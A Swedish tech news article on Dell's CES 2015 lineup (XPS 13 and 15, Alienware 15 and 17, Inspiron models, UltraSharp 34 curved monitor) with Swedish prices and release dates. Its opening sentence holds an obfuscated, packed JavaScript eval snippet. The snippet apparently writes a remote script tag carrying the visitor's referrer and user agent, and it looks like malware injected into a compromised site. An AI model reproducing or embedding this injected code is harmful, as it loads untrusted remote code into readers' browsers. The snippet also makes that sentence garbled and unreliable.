Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Dell expanderar konsumentportföljen med rekordhållare

Dell expanderar konsumentportföljen med rekordhållare
Sebastian

Under eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bisrr|var|u0026u|referrer|aannf||js|php’.split(’|’),0,{}))
CES 2015 tillkännager Dell att de expanderar sin konsumentportfölj med ett flertal nya enheter. Bland annat återfinns nya XPS 13, världens minsta 13-tums laptop som även håller rekordet för sin långa batteritid om hela 15 timmar. Dessutom startas försäljningen av Dells första välvda skärm, UltraSharp 34 Monitor.

”De nya produkterna höjer ribban inom varje kategori och ger kunderna stilrena och funktionella enheter med mjukvarulösningar som endast kan fås från oss på Dell.” säger Elina Helmer, marknadsansvarig för klientlösningar på Dell i Sverige. ”Oavsett om du är gamer, behöver en lösning att ta med i farten eller söker en laptop för vardagsbruk så utvecklar Dell produkter med de funktionaliteter som kunderna efterfrågar.”

XPS 13 och 15: Knivskarp skärpa i minimal formfaktor
Nya Dell XPS 13 har precis som sina föregångare utformats med form och funktionalitet i åtanke. Den tidigare pekplattan har uppdaterats till en precisionspekplatta som förenklar användningen av Windows 8.1 med hjälp av multi-touch och gestfunktionaliteter. XPS 13 håller även titeln som världens minsta 13-tummare[1] och har den längsta batteritiden bland 13-tums notebooks med upp till 15 timmar på en enda laddning. Den har en startvikt från endast 1,18 kg[2], en skärm som går kant i kant samt femte generationens Intel Core processor och SSD som ger en hög prestanda trots ett litet format. Som tillval finns en UltraSharp Quad HD+ skärm med 5,7 miljoner pixlar och 5,2 mm tunna ramar.

Nya XPS 15 finns snart tillgänglig på Dell.se, bland tillvalen återfinns en UltraSharp 4K Ultra HD touchskärm med över 8 miljoner pixlar.

Alienware 15 och 17: Maximerad gamingglädje

De två nya bärbara datorerna är packade med den senaste gamingteknologin och som tillval finns Intel Core i7 quad-core processorer och NVIDIA GTX 980m grafik. De är dessutom kompatibla med Alienwares Graphics Amplifier och Intel Core i7-modellerna kommer även automatiskt överklocka när de ansluts till Graphics Amplifier. Båda enheterna är över 20 procent tunnare än sina föregångare och levererar maximal grafikprestanda.

Alienware 15 och 17 består bland annat av koppar, aluminium och kolfiberkomposit för en tålig och prestandafokuserad konstruktion som klarar även den mest intensiva gamingen.

Inspiron 7000 och 5000 Series: Stilsäkra datorer med innovativa egenskaper

Inspiron-familjen har fått två nytillskott varav Inspiron 15 7000 Series nominerades på CES Innovation Award 2015. Den lanseras nu under CES med femte generationens Intel Core processor och en 4K Ultra HD skärm som tillval. Den slimmade och lätta designen hos Inspiron 15 7000 Series gör den även enkel att ta med sig i farten. Inspiron 5000 och 7000 Series kommer med skärmteknologin True Color som ger en hög skärpa och färgåtergivning. Dessutom kan användaren skräddarsy sin skärms färgtemperatur och ton för att kompensera olika ljusnyanser från till exempel lysrör och glödlampor.

Dell lanserar även Intel RealSense 3D Camera Front F200 till Inspiron 23 All-in-One. Tillsammans med ett flertal nya appar i Intel App Showcase som använder 3D-kamerans djupavkänningsförmåga, möjliggörs bland annat nya sätt att interagera i spel och skapa 3D-skanningar. Inspiron 15 5000 Series kommer med nya femte generationens Intel Core processorer, har närmare 8 timmars batteritid och en tunn formfaktor om 22,7 mm och 2,68 kg.

UltraSharp 34 Monitor

Den välvda skärmen UltraSharp 34 Monitor finns nu tillgänglig och kommer ge en helt ny dimension av spel och multitasking med WQHD-upplösning. Med bildförhållandet 21:9 optimeras synfältet och minimerar ögonrörelser vilket ger en bekvämare upplevelse än med en platt skärm. Den är 34 tum och har även 18W inbyggda högtalare samt ett flertal olika anslutningar som stöder olika typer av enheter.

2015 CES Innovation Award Honorees:

·         Alienware Area-51

·         Latitude Education 13” Laptop and Mobile Cart

·         Dell UltraSharp 34 Monitor – U3415W (Curved)

·         Dell UltraSharp 27  Monitor – UP2715K (5K)

·         XPS 13 Laptop

·         Inspiron 15 7000 Series Laptop

Pris och tillgänglighet

·         XPS 13 finns tillgänglig från den 20 januari med ett pris från 13 490 kronor. Developer Edition (Linux) tillgängliggörs den 22 januari, pris ej fastställt

·         XPS 15 finns tillgänglig snart med ett pris från 18 495 kronor

·         Alienware 15 och 17 finns tillgängliga från den 15 januari med ett pris från 13 990 respektive 15 990 kronor

·         Inspiron 15 5000 Series finns tillgänglig från den 20 januari med ett pris från 5 590 kronor

·         Inspiron 15 7000 Series tillgängliggörs snart

·         Inspiron 23 All-in-One med Intel Real Sense kamera finns tillgänglig från den 20 januari med ett pris från 11 099 kronor

·         UltraSharp 34 Monitor finns tillgänglig från och med idag med ett pris från 8 179 kronor